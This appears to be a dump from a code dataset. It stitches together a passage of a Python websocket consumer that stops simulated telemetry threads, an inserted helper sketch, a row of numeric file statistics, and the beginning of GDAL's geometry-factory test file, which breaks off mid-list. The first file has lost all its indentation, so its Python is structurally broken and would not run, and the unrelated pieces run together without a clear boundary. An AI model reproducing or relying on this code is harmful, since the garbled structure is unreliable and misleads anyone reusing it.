elif global_obj.simulator_threads[2].is_alive():
global_obj.hub_to_simulator_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[2].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 3 and fake at 3 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake at thread 3 was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[2].is_alive():
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[2].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[2].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread three.'
if successful:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 3 and fake telemetry 3 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 3 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then send back already killed message
else:
r.srem('fake-telemetry-three', self.channel_name)
if r.scard("fake-telemetry-three") != 0:
r.delete("fake-telemetry-three")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_three'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 3 and fake at thread 3 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
# Check if both simulator and at threads are not initialized
if global_obj.simulator_threads[3] is None and global_obj.simulator_at_threads[3] is None:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to telemetry four but the fake at thread 4 and fake '
'telemetry thread 4 are not running currently.',
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is not initialized
elif global_obj.simulator_threads[3] is None:
# Check if at thread is alive, then kill that thread
if global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 4 and fake telemetry 4 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 4 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 4 thread was not initialized and fake at thread 4 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[3] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 4 and fake at 4 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 4 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 4 was not initialized and fake telemetry 4 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[3].is_alive() and global_obj.simulator_at_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_four'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread four.'
global_obj.simulator_at_threads[3].join(2.0)
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry four. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' ' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 4 and fake at 4 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake at thread 4 was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 4 and fake telemetry 4 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 4 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then send back already killed message
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 4 and fake at thread 4 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user was not assigned a telemetry. Proceed.',
'attempt': content.get('attempt')
}
}))
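# get_parameters: ask the hub for the parameter list of whichever telemetry group this
# channel is currently assigned to (real sEclss, hera, or one of the fake telemetry slots).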
elif content.get('type') == 'get_parameters':
if r.sismember('seclss-group-users', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params', 'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
elif r.sismember('hera-group-users', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params', 'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif content.get('msg_type') == 'get_real_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params'})
elif content.get('msg_type') == 'get_hera_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params'})
elif content.get('msg_type') == 'get_fake_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif content.get('type') == 'ping':
signal = {'type': 'ping', 'channel_name': self.channel_name}
frontend_to_hub_queue.put(signal)
elif content.get('type') == 'add_User':
username = content.get('userName')
userChannelNames[username] = self.channel_name
userChannelLayers[username] = self.channel_layer
elif content.get('type') == 'remove_User':
username = content.get('userName')
del userChannelNames[username]
del userChannelLayers[username]
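# Channel-layer event handlers: each one simply relays the event payload produced by the
# hub / telemetry threads to this websocket client as JSON.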
def hub_thread_response(self, event):
self.send(json.dumps(event))
def stop_telemetry_response(self, event):
self.send(json.dumps(event))
def fake_telemetry_response(self, event):
self.send(json.dumps(event))
def real_telemetry_response(self, event):
self.send(json.dumps(event))
def hera_telemetry_response(self, event):
self.send(json.dumps(event))
def console_text(self, event):
self.send(json.dumps(event))
def telemetry_update(self, event):
self.send(json.dumps(event))
def initialize_telemetry(self, event):
self.send(json.dumps(event))
def symptoms_report(self, event):
self.send(json.dumps(event))
def ws_configuration_update(self, event):
self.send(json.dumps(event))
def finish_experiment_from_mcc(self, event):
self.send(json.dumps(event))
def turn_off_alarms(self, event):
self.send(json.dumps(event))
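# --- Editorial sketch (not part of the original module) -----------------------------------
# Every stop_telemetry branch above repeats the same steps: signal a thread's queue to stop,
# join with a timeout, check is_alive(), and build a status message. A hypothetical helper
# such as the one below illustrates how that pattern could be factored out; the name
# stop_and_confirm and its signature are assumptions, not an existing API in this codebase.
def stop_and_confirm(thread, stop_queue, error_text, timeout=2.0):
    """Ask a telemetry thread to stop and report whether it actually exited."""
    if thread is None or not thread.is_alive():
        # Nothing to stop; treat as success with no error message.
        return True, ''
    stop_queue.put({'type': 'stop'})  # same stop signal the hub threads consume
    thread.join(timeout)              # bounded wait for the thread to exit
    if thread.is_alive():
        return False, error_text      # e.g. 'There was an error stopping ...'
    return True, ''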
| 65.70661 | 126 | 0.407 | 27,541 | 339,966 | 4.808286 | 0.010493 | 0.064157 | 0.051108 | 0.034661 | 0.980147 | 0.977187 | 0.970595 | 0.967295 | 0.962628 | 0.949556 | 0 | 0.007169 | 0.521973 | 339,966 | 5,173 | 127 | 65.719312 | 0.807689 | 0.08815 | 0 | 0.897073 | 0 | 0.000488 | 0.185143 | 0.038345 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003902 | false | 0 | 0.003415 | 0 | 0.008537 | 0.035854 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
40655400ed75695f443623c8ebac44c2333388bd | 32,385 | py | Python | autotest/ogr/ogr_factory.py | robe2/gdal | 78573efe69f1506c112209501068c0b043438295 | [ "MIT" ] | null | null | null | autotest/ogr/ogr_factory.py | robe2/gdal | 78573efe69f1506c112209501068c0b043438295 | [ "MIT" ] | null | null | null | autotest/ogr/ogr_factory.py | robe2/gdal | 78573efe69f1506c112209501068c0b043438295 | [ "MIT" ] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test some geometry factory methods, like arc stroking.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2008, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2010-2012, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import ogrtest
import gdaltest
from osgeo import gdal
from osgeo import ogr
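# Debug helper: dump a single geometry as a one-row CSV (note the hard-coded path under /home/warmerda/).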
def save_as_csv( geom, filename ):
csv = 'ID,WKT\n0,"%s"\n' % geom.ExportToWkt()
open('/home/warmerda/'+filename,'w').write(csv)
###############################################################################
# 30 degree rotated ellipse, just one quarter.
def ogr_factory_1():
geom = ogr.ApproximateArcAngles( 20, 30, 40, 7, 3.5, 30.0, 270.0, 360.0, 6.0 )
expected_geom = 'LINESTRING (21.75 33.031088913245533 40,22.374083449152831 32.648634669593925 40,22.972155943227843 32.237161430239802 40,23.537664874825239 31.801177382099848 40,24.064414409750082 31.345459257641004 40,24.546633369868303 30.875 40,24.979038463342047 30.394954059253475 40,25.356892169480634 29.910580919184319 40,25.676054644008637 29.427187473276717 40,25.933029076066084 28.95006988128063 40,26.125 28.484455543377237 40,26.249864142195264 28.035445827688662 40,26.306253464980482 27.607960178621322 40,26.293550155134998 27.206682218403525 40,26.211893392779814 26.836008432340218 40,26.062177826491073 26.5 40)'
if ogrtest.check_feature_geometry( geom, expected_geom ):
return 'fail'
else:
return 'success'
###############################################################################
# Test forceToPolygon()
def ogr_factory_2():
src_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTISURFACE (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,100 0,100 100,0 0))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON (CIRCULARSTRING(0 0,0 1,0 2,1 2,2 2,2 1,2 0,1 0,0 0))'
exp_wkt = 'POLYGON ((0 0,0 1,0 2,1 2,2 2,2 1,2 0,1 0,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiPolygon()
def ogr_factory_3():
src_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(POLYGON((0 0,100 0,100 100,0 0)))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,100 0,100 100,0 0))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTISURFACE (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiPoint()
def ogr_factory_4():
src_wkt = 'POINT(2 5 3)'
exp_wkt = 'MULTIPOINT(2 5 3)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPoint( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(POINT(2 5 3),POINT(4 5 5))'
exp_wkt = 'MULTIPOINT(2 5 3,4 5 5)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPoint( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiLineString()
def ogr_factory_5():
src_wkt = 'LINESTRING(2 5,10 20)'
exp_wkt = 'MULTILINESTRING((2 5,10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(LINESTRING(2 5,10 20),LINESTRING(0 0,10 10))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'POLYGON((2 5,10 20),(0 0,10 10))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTIPOLYGON(((2 5,10 20),(0 0,10 10)),((2 5,10 20)))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10),(2 5,10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test robustness of forceToXXX() primitives with various inputs (#3504)
def ogr_factory_6():
src_wkt_list = [ None,
'POINT EMPTY',
'LINESTRING EMPTY',
'POLYGON EMPTY',
'MULTIPOINT EMPTY',
'MULTILINESTRING EMPTY',
'MULTIPOLYGON EMPTY',
'GEOMETRYCOLLECTION EMPTY',
'POINT(0 0)',
'LINESTRING(0 0)',
'POLYGON((0 0))',
'POLYGON(EMPTY,(0 0),EMPTY,(1 1))',
'MULTIPOINT(EMPTY,(0 0),EMPTY,(1 1))',
'MULTILINESTRING(EMPTY,(0 0),EMPTY,(1 1))',
'MULTIPOLYGON(((0 0),EMPTY,(1 1)),EMPTY,((2 2)))',
'GEOMETRYCOLLECTION(POINT EMPTY)',
'GEOMETRYCOLLECTION(LINESTRING EMPTY)',
'GEOMETRYCOLLECTION(POLYGON EMPTY)',
'GEOMETRYCOLLECTION(MULTIPOINT EMPTY)',
'GEOMETRYCOLLECTION(MULTILINESTRING EMPTY)',
'GEOMETRYCOLLECTION(MULTIPOLYGON EMPTY)',
'GEOMETRYCOLLECTION(GEOMETRYCOLLECTION EMPTY)',
'GEOMETRYCOLLECTION(POINT(0 0))',
'GEOMETRYCOLLECTION(LINESTRING(0 0),LINESTRING(1 1))',
'GEOMETRYCOLLECTION(POLYGON((0 0),EMPTY,(2 2)), POLYGON((1 1)))',
'CURVEPOLYGON EMPTY',
'CURVEPOLYGON ((0 0,0 1,1 1,1 0,0 0))',
'CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))',
'COMPOUNDCURVE EMPTY',
'COMPOUNDCURVE ((0 0,0 1,1 1,1 0,0 0))',
'COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))',
'CIRCULARSTRING EMPTY',
'CIRCULARSTRING (0 0,1 0,0 0)',
'MULTISURFACE EMPTY',
'MULTISURFACE (((0 0,0 1,1 1,1 0,0 0)))',
'MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,1 0,0 0)))',
'MULTICURVE EMPTY',
'MULTICURVE ((0 0,0 1))',
'MULTICURVE (COMPOUNDCURVE((0 0,0 1)))',
'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))',
]
for src_wkt in src_wkt_list:
if src_wkt is None:
src_geom = None
else:
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
ogr.ForceToPolygon( src_geom )
ogr.ForceToMultiPolygon( src_geom )
ogr.ForceToMultiPoint( src_geom )
ogr.ForceToMultiLineString( src_geom )
ogr.ForceToLineString( src_geom )
for target_type in range(ogr.wkbMultiSurface):
gdal.PushErrorHandler('CPLQuietErrorHandler')
ogr.ForceTo( src_geom, 1 + target_type )
gdal.PopErrorHandler()
#print(src_geom.ExportToWkt(), dst_geom1.ExportToWkt(), dst_geom2.ExportToWkt(), dst_geom3.ExportToWkt(), dst_geom4.ExportToWkt())
return 'success'
###############################################################################
# Test forceToLineString()
def ogr_factory_7():
src_wkt = 'LINESTRING(2 5,10 20)'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTICURVE((2 5,10 20))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTICURVE(COMPOUNDCURVE((2 5,10 20)))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(3 4,30 40))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(3 4,30 40))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20,30 40))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(LINESTRING(2 5,10 20),LINESTRING(10 20,30 40))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20,30 40),(30 40,50 60))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40,50 60)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'POLYGON ((0 0,0 1,1 1,1 0,0 0))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,0 1,1 1,1 0,0 0))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,1 0,0 0)))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceTo()
def ogr_factory_8():
tests = [ ('POINT(2 5)', 'MULTIPOINT (2 5)', ogr.wkbMultiPoint ),
('LINESTRING(2 5,10 20)', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
